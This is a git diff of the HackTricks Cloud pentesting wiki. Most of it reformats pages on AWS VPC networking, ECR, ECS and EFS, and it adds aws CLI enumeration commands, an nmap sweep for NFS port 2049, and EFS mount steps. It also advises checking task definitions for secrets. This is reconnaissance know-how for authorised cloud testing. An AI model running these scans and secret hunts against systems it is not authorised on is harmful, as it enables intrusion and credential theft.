-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md similarity index 63% rename from pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md rename to src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md index 2f490c3e8..08abe0d21 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md @@ -1,19 +1,6 @@ # AWS - VPC & Networking Basic Information -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## AWS Networking in a Nutshell @@ -27,14 +14,14 @@ Therefore, a **security group** will limit the exposed ports of the network **in Moreover, in order to **access Internet**, there are some interesting configurations to check: -* A **subnetwork** can **auto-assign public IPv4 addresses** -* An **instance** created in the network that **auto-assign IPv4 addresses can get one** -* An **Internet gateway** need to be **attached** to the **VPC** - * You could also use **Egress-only internet gateways** -* You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**. - * The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs) +- A **subnetwork** can **auto-assign public IPv4 addresses** +- An **instance** created in the network that **auto-assign IPv4 addresses can get one** +- An **Internet gateway** need to be **attached** to the **VPC** + - You could also use **Egress-only internet gateways** +- You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**. + - The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs) -![](<../../../../.gitbook/assets/image (274).png>) +![](<../../../../images/image (274).png>) ## VPC @@ -44,10 +31,10 @@ Amazon **Virtual Private Cloud** (Amazon VPC) enables you to **launch AWS resour Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure. -* Valid CIDR are from a /16 netmask to a /28 netmask. -* A subnet cannot be in different availability zones at the same time. -* **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use. -* It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.** +- Valid CIDR are from a /16 netmask to a /28 netmask. +- A subnet cannot be in different availability zones at the same time. +- **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use. +- It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.**
@@ -57,11 +44,11 @@ Subnets helps to enforce a greater level of security. **Logical grouping of simi Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection. You will usually find access to the: -* Local VPC -* NAT -* Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet). - * In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. -* VPC endpoints (to access S3 from private networks) +- Local VPC +- NAT +- Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet). + - In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. +- VPC endpoints (to access S3 from private networks) In the following images you can check the differences in a default public network and a private one: @@ -73,8 +60,8 @@ In the following images you can check the differences in a default public networ **Network Access Control Lists (ACLs)**: Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges. -* It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections -* However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed +- It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections +- However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed ### Security Groups @@ -111,13 +98,13 @@ Unlike S3 access logs and CloudFront access logs, the **log data generated by VP Limitations: -* If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account. -* If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces -* Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one. -* The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server. -* Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service. -* Traffic relating to an Amazon Windows activation license from a Windows instance -* Traffic between a network load balancer interface and an endpoint network interface +- If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account. +- If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces +- Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one. +- The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server. +- Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service. +- Traffic relating to an Amazon Windows activation license from a Windows instance +- Traffic between a network load balancer interface and an endpoint network interface For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**. @@ -126,47 +113,48 @@ For every network interface that publishes data to the CloudWatch log group, it ### Basic AWS VPN Components 1. **Customer Gateway**: - * A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. - * It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. - * You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. - * It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. + - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. + - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. + - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. + - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. 2. **Virtual Private Gateway**: - * A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. - * It is attached to your VPC and serves as the target for your VPN connection. - * VPG is the AWS side endpoint for the VPN connection. - * It handles the secure communication between your VPC and your on-premises network. + - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. + - It is attached to your VPC and serves as the target for your VPN connection. + - VPG is the AWS side endpoint for the VPN connection. + - It handles the secure communication between your VPC and your on-premises network. 3. **Site-to-Site VPN Connection**: - * A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. - * This type of connection requires a Customer Gateway and a Virtual Private Gateway. - * It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. - * Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. + - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. + - This type of connection requires a Customer Gateway and a Virtual Private Gateway. + - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. + - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. 4. **Client VPN Endpoint**: - * A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. - * It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. - * It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. - * With Client VPN, each client device uses a VPN client software to establish a secure connection. + - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. + - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. + - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. + - With Client VPN, each client device uses a VPN client software to establish a secure connection. ### Site-to-Site VPN **Connect your on premisses network with your VPC.** -* **VPN connection**: A secure connection between your on-premises equipment and your VPCs. -* **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. +- **VPN connection**: A secure connection between your on-premises equipment and your VPCs. +- **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. - Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability. -* **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device. -* **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection. -* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. -* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. + Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability. + +- **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device. +- **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection. +- **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. +- **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. #### Limitations -* IPv6 traffic is not supported for VPN connections on a virtual private gateway. -* An AWS VPN connection does not support Path MTU Discovery. +- IPv6 traffic is not supported for VPN connections on a virtual private gateway. +- An AWS VPN connection does not support Path MTU Discovery. In addition, take the following into consideration when you use Site-to-Site VPN. -* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. +- When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. ### Client VPN @@ -174,46 +162,34 @@ In addition, take the following into consideration when you use Site-to-Site VPN #### Concepts -* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. -* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. -* **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. -* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. -* **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. -* **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. -* **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. -* **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address. -* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. -* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. +- **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. +- **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. +- **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. +- **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. +- **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. +- **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. +- **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. +- **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address. +- **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. +- **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. #### Limitations -* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. -* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** -* A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint. -* The **client CIDR range cannot be changed** after you create the Client VPN endpoint. -* The **subnets** associated with a Client VPN endpoint **must be in the same VPC**. -* You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**. -* A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**. -* Client VPN supports **IPv4** traffic only. -* Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**. -* If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format. +- **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. +- Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** +- A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint. +- The **client CIDR range cannot be changed** after you create the Client VPN endpoint. +- The **subnets** associated with a Client VPN endpoint **must be in the same VPC**. +- You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**. +- A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**. +- Client VPN supports **IPv4** traffic only. +- Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**. +- If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format. - ``` - SCRV1:: - ``` -* The self-service portal is **not available for clients that authenticate using mutual authentication**. + ``` + SCRV1:: + ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +- The self-service portal is **not available for clients that authenticate using mutual authentication**. -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md new file mode 100644 index 000000000..054b414b8 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md @@ -0,0 +1,102 @@ +# AWS - ECR Enum + +## AWS - ECR Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### ECR + +#### Basic Information + +Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images. + +ECR is compose by 2 types of objects: **Registries** and **Repositories**. + +**Registries** + +Every AWS account has 2 registries: **Private** & **Public**. + +1. **Private Registries**: + +- **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission. + - The URI of a **private repository** follows the format `.dkr.ecr..amazonaws.com/` +- **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles. +- **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS... +- **Other private registry options**: + - The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images. + - The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions. + - The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**. + - Specific **IAM policies** can be configured to grant different **permissions**. + - The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo. + +2. **Public Registries**: + +- **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.** + - The URI of a **public repository** is like `public.ecr.aws//`. Although the `` part can be changed by the admin to another string easier to remember. + +**Repositories** + +These are the **images** that in the **private registry** or to the **public** one. + +> [!NOTE] +> Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**. + +#### Registry & Repository Policies + +**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image: + +
+ +#### Enumeration + +```bash +# Get repos +aws ecr describe-repositories +aws ecr describe-registry + +# Get image metadata +aws ecr list-images --repository-name +aws ecr describe-images --repository-name +aws ecr describe-image-replication-status --repository-name --image-id +aws ecr describe-image-scan-findings --repository-name --image-id +aws ecr describe-pull-through-cache-rules --repository-name --image-id + +# Get public repositories +aws ecr-public describe-repositories + +# Get policies +aws ecr get-registry-policy +aws ecr get-repository-policy --repository-name +``` + +#### Unauthenticated Enum + +{{#ref}} +../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md +{{#endref}} + +#### Privesc + +In the following page you can check how to **abuse ECR permissions to escalate privileges**: + +{{#ref}} +../aws-privilege-escalation/aws-ecr-privesc.md +{{#endref}} + +#### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-ecr-post-exploitation.md +{{#endref}} + +#### Persistence + +{{#ref}} +../aws-persistence/aws-ecr-persistence.md +{{#endref}} + +## References + +- [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md new file mode 100644 index 000000000..94aa75376 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md @@ -0,0 +1,82 @@ +# AWS - ECS Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## ECS + +### Basic Information + +Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**. + +ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**. + +- **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”. +- **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups. + - There **2 types of applications**: + - **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application. + - **Task**: A standalone task that runs and terminates. For example, a batch job. + - Among the service applications, there are **2 types of service schedulers**: + - [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node. + - [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies. +- **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**... + - Check **env variables for sensitive info**! + +### Sensitive Data In Task Definitions + +Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within. + +Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions. + +### Enumeration + +```bash +# Clusters info +aws ecs list-clusters +aws ecs describe-clusters --clusters + +# Container instances +## An Amazon ECS container instance is an Amazon EC2 instance that is running the Amazon ECS container agent and has been registered into an Amazon ECS cluster. +aws ecs list-container-instances --cluster +aws ecs describe-container-instances --cluster --container-instances + +# Services info +aws ecs list-services --cluster +aws ecs describe-services --cluster --services +aws ecs describe-task-sets --cluster --service + +# Task definitions +aws ecs list-task-definition-families +aws ecs list-task-definitions +aws ecs list-tasks --cluster +aws ecs describe-tasks --cluster --tasks +## Look for env vars and secrets used from the task definition +aws ecs describe-task-definition --task-definition : +``` + +### Unauthenticated Access + +{{#ref}} +../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md +{{#endref}} + +### Privesc + +In the following page you can check how to **abuse ECS permissions to escalate privileges**: + +{{#ref}} +../aws-privilege-escalation/aws-ecs-privesc.md +{{#endref}} + +### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-ecs-post-exploitation.md +{{#endref}} + +### Persistence + +{{#ref}} +../aws-persistence/aws-ecs-persistence.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md similarity index 51% rename from pentesting-cloud/aws-security/aws-services/aws-efs-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md index 75d6aad44..1a7079ae8 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md @@ -1,19 +1,6 @@ # AWS - EFS Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## EFS @@ -53,13 +40,11 @@ aws efs describe-replication-configurations sudo nmap -T4 -Pn -p 2049 --open 10.10.10.0/20 # or /16 to be sure ``` -{% hint style="danger" %} -It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**. -{% endhint %} +> [!CAUTION] +> It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**. ### Mount EFS -{% code overflow="wrap" %} ```bash sudo mkdir /efs @@ -73,7 +58,6 @@ sudo yum install amazon-efs-utils # If centos sudo apt-get install amazon-efs-utils # If ubuntu sudo mount -t efs :/ /efs/ ``` -{% endcode %} ### IAM Access @@ -82,30 +66,30 @@ For example, this File System policy **won't allow even to mount** the file syst ```json { - "Version": "2012-10-17", - "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797", - "Statement": [ - { - "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "", - "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018", - "Condition": { - "Bool": { - "elasticfilesystem:AccessedViaMountTarget": "true" - } - } + "Version": "2012-10-17", + "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797", + "Statement": [ + { + "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "", + "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018", + "Condition": { + "Bool": { + "elasticfilesystem:AccessedViaMountTarget": "true" } - ] + } + } + ] } ``` Or this will **prevent anonymous access**: -
+
Note that to mount file systems protected by IAM you MUST use the type "efs" in the mount command: @@ -130,45 +114,31 @@ sudo mount -t efs -o tls,[iam],accesspoint= \ /efs/ ``` -{% hint style="warning" %} -Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it. -{% endhint %} +> [!WARNING] +> Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it. Access points can be used for the following purposes: -* **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions. -* **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification. -* **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications. +- **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions. +- **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification. +- **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications. ## Privesc -{% content-ref url="../aws-privilege-escalation/aws-efs-privesc.md" %} -[aws-efs-privesc.md](../aws-privilege-escalation/aws-efs-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-efs-privesc.md +{{#endref}} ## Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-efs-post-exploitation.md" %} -[aws-efs-post-exploitation.md](../aws-post-exploitation/aws-efs-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-efs-post-exploitation.md +{{#endref}} ## Persistence -{% content-ref url="../aws-persistence/aws-efs-persistence.md" %} -[aws-efs-persistence.md](../aws-persistence/aws-efs-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-efs-persistence.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
